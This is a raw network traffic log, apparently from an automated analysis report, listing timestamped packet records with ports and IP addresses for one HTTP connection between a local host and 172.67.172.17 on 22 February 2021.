Feb 22, 2021 09:14:34.399374962 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.400355101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.400388956 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.400459051 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.401432991 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.401467085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.401544094 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.439389944 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.439451933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.439903021 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.439940929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.439949989 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.439992905 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.441016912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.441057920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.441137075 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.442075014 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.442112923 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.442181110 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.443197012 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.443236113 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.443319082 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.444377899 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.444412947 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.444500923 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.445419073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.445470095 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.445558071 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.446499109 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.446523905 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.446593046 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.447616100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.447655916 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.447756052 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.448726892 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.448767900 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.448837996 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.449836016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.449875116 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.449976921 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.450947046 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.450994015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.451054096 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.452034950 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.452080965 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.452178001 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.453181028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.453216076 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.453325987 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.454237938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.454272032 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.454339981 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.455355883 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.455889940 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.455924988 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.455981016 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.457068920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.457107067 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.457154036 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.458112955 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.458158016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.458221912 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.459223986 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.459269047 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.459333897 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.460313082 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.460350037 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.460412025 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.461467028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.461507082 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.461529016 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.462572098 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.462616920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.462692976 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.463685036 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.463728905 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.463746071 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.464776039 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.464821100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.464843035 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.487205982 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.487241983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.487284899 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.487673998 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.487703085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.487797022 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.488766909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.488800049 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.488823891 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.489898920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.489937067 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.489978075 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.490977049 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.491005898 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.491091013 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.492085934 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.492115974 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.492191076 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.493180037 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.493205070 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.493278980 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.494263887 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.494292021 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.494349957 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.495359898 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.495388985 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.495450020 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.496476889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.496504068 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.496537924 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.497503996 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.497524977 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.497586966 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.498620033 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.498646975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.498713017 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.499672890 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.499699116 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.499789953 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.500773907 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.500799894 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.500830889 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.501888037 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.501912117 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.502034903 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.503118038 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.503144979 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.503237009 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.504296064 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.504328966 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.504429102 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.505422115 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.505486965 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.505626917 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.506433010 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.506500006 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.506511927 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.507566929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.507601976 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.507961035 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.508650064 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.508675098 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.508722067 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.509829998 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.509859085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.509921074 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.510847092 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.510878086 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.510952950 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.511970043 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.511991978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.512072086 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.534473896 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.534495115 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.534590006 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.534923077 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.534950972 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.535021067 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.536057949 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.536087036 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.536233902 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.537074089 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.537102938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.537157059 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.538193941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.538223028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.538281918 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.539309025 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.539338112 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.539365053 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.540401936 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.540430069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.540474892 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.541523933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.541548967 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.541608095 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.542551041 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.542581081 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.542646885 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.543665886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.543690920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.543768883 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.544692993 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.544720888 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.544806004 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.545813084 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.545840979 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.545933008 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.546149969 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.546212912 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.546879053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.546912909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.546972990 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.549153090 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.549185991 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.549252033 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.549458981 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.549482107 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.549536943 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.550378084 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.550407887 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.550497055 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.551573038 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.551603079 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.551678896 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.553668022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.553699017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.553776026 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.555078983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.555107117 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.555320024 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.555833101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.555876017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.556741953 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.557081938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.557109118 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.557180882 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.557337999 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.557364941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.557447910 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.558052063 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.558078051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.558167934 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.559196949 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.559218884 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.559295893 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.581784010 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.581821918 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.581904888 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.582139969 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.582161903 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.582235098 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.583435059 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.583470106 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.583555937 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.584259987 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.584286928 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.584393978 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.586498022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.586534023 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.586631060 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.587599993 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.587627888 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.587738037 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.587889910 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.587913990 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.587974072 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.588742971 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.588773966 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.588869095 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.589757919 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.589786053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.589862108 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.590913057 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.590939045 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.591021061 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.591909885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.591938972 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.592011929 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.593100071 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.593133926 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.593255997 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.593425035 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.593452930 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.593527079 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.594105005 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.594145060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.594228983 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.594784021 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.594816923 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.594876051 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.595463991 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.595495939 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.595563889 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.596121073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.596153975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.596230030 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.596788883 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.596817017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.596910000 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.597501993 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.597526073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.597788095 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.598141909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.598174095 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.598293066 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.598834038 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.598866940 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.598937035 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.599502087 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.599529982 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.599610090 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.600300074 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.600328922 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.600414038 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.600831032 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.600857973 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.600925922 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.601519108 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.601574898 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.601650000 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.602225065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.602248907 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.602318048 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.602863073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.602889061 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.602972984 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.603535891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.603569031 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.603661060 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.604199886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.604227066 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.604300022 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.604912996 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.604937077 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.605027914 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.605556965 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.605580091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.605663061 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.606230974 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.606259108 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.606332064 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.606951952 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.606990099 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.607070923 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.607610941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.607640028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.607702017 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.608257055 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.608284950 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.608361006 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.608931065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.608958960 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.609028101 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.609602928 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.609632015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.609731913 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.610276937 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.610304117 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.610374928 CET	49761	80	192.168.2.4	172.67.172.17
